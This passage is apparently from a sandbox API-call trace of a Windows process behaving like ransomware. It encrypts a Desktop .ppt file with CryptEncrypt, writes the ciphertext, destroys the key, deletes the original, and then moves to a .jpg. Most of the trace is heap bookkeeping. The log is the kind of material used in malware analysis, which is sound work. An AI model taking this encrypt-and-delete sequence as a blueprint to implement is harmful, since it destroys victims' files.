lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0121.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0121.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0121.017] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0121.017] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0121.017] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0121.017] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0121.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0121.017] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xbc9f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xbca0) returned 1 [0121.017] CharLowerBuffW (in: lpsz="byte[48289]", cchLength=0xb | out: lpsz="byte[48289]") returned 0xb [0121.018] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.018] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0121.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0121.018] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49cd608*, pdwDataLen=0x144e790*=0xbc9f, dwBufLen=0xbca0 | out: pbData=0x49cd608*, pdwDataLen=0x144e790*=0xbca0) returned 1 [0121.018] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0121.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0121.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0121.019] WriteFile (in: hFile=0x258, lpBuffer=0x49b5cb8*, nNumberOfBytesToWrite=0xbca0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49b5cb8*, lpNumberOfBytesWritten=0x144f194*=0xbca0, lpOverlapped=0x0) returned 1 [0121.020] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0121.020] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caa00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0121.021] CryptDestroyKey (hKey=0x41ac100) returned 1 [0121.021] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0121.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0121.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0121.021] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0121.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0121.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0121.021] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.021] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0121.021] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0121.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0121.021] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0121.021] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.021] FreeLibrary (hLibModule=0x756e0000) returned 1 [0121.021] CloseHandle (hObject=0x2a0) returned 1 [0121.021] CloseHandle (hObject=0x258) returned 1 [0121.023] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\aZ 2dgF6.ppt", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\aZ 2dgF6.ppt", lpFilePart=0x0) returned 0x24 [0121.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0121.023] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aZ 2dgF6.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\az 2dgf6.ppt")) returned 0x20 [0121.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a450 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0121.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43924c8 [0121.024] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\aZ 2dgF6.ppt", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58249d20, ftCreationTime.dwHighDateTime=0x1d5e324, ftLastAccessTime.dwLowDateTime=0xae133060, ftLastAccessTime.dwHighDateTime=0x1d5ea64, ftLastWriteTime.dwLowDateTime=0xae133060, ftLastWriteTime.dwHighDateTime=0x1d5ea64, nFileSizeHigh=0x0, nFileSizeLow=0xbc9f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="aZ 2dgF6.ppt", cAlternateFileName="AZ2DGF~1.PPT")) returned 0x41ac040 [0121.024] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aZ 2dgF6.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\az 2dgf6.ppt")) returned 1 [0121.299] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58249d20, ftCreationTime.dwHighDateTime=0x1d5e324, ftLastAccessTime.dwLowDateTime=0xae133060, ftLastAccessTime.dwHighDateTime=0x1d5ea64, ftLastWriteTime.dwLowDateTime=0xae133060, ftLastWriteTime.dwHighDateTime=0x1d5ea64, nFileSizeHigh=0x0, nFileSizeLow=0xbc9f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="aZ 2dgF6.ppt", cAlternateFileName="AZ2DGF~1.PPT")) returned 0 [0121.299] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0121.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43924c8 | out: hHeap=0x1780000) returned 1 [0121.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0121.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0121.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0121.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0121.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0121.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0121.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0121.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0121.299] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0121.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0121.299] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0121.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7b00 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0121.300] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0121.300] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0121.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0121.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0121.300] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0121.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0121.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0121.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0121.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0121.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0121.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0121.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0121.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0121.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0121.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0121.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0121.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da350 [0121.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0121.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0121.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0121.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0121.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0121.301] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0121.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0121.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0121.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0121.301] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0121.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0121.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0121.302] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\BbxrQ2nHZPP_A.jpg", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32544d0, ftCreationTime.dwHighDateTime=0x1d5e188, ftLastAccessTime.dwLowDateTime=0x95acb310, ftLastAccessTime.dwHighDateTime=0x1d5e272, ftLastWriteTime.dwLowDateTime=0x95acb310, ftLastWriteTime.dwHighDateTime=0x1d5e272, nFileSizeHigh=0x0, nFileSizeLow=0x15e76, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="BbxrQ2nHZPP_A.jpg", cAlternateFileName="BBXRQ2~1.JPG")) returned 0x41ac600 [0121.302] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0121.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0121.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0121.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0121.302] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0121.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0121.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0121.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c20 [0121.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0121.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0121.303] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0121.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0121.303] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0121.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392340 | out: hHeap=0x1780000) returned 1 [0121.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0121.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0121.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0121.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0121.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0121.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) 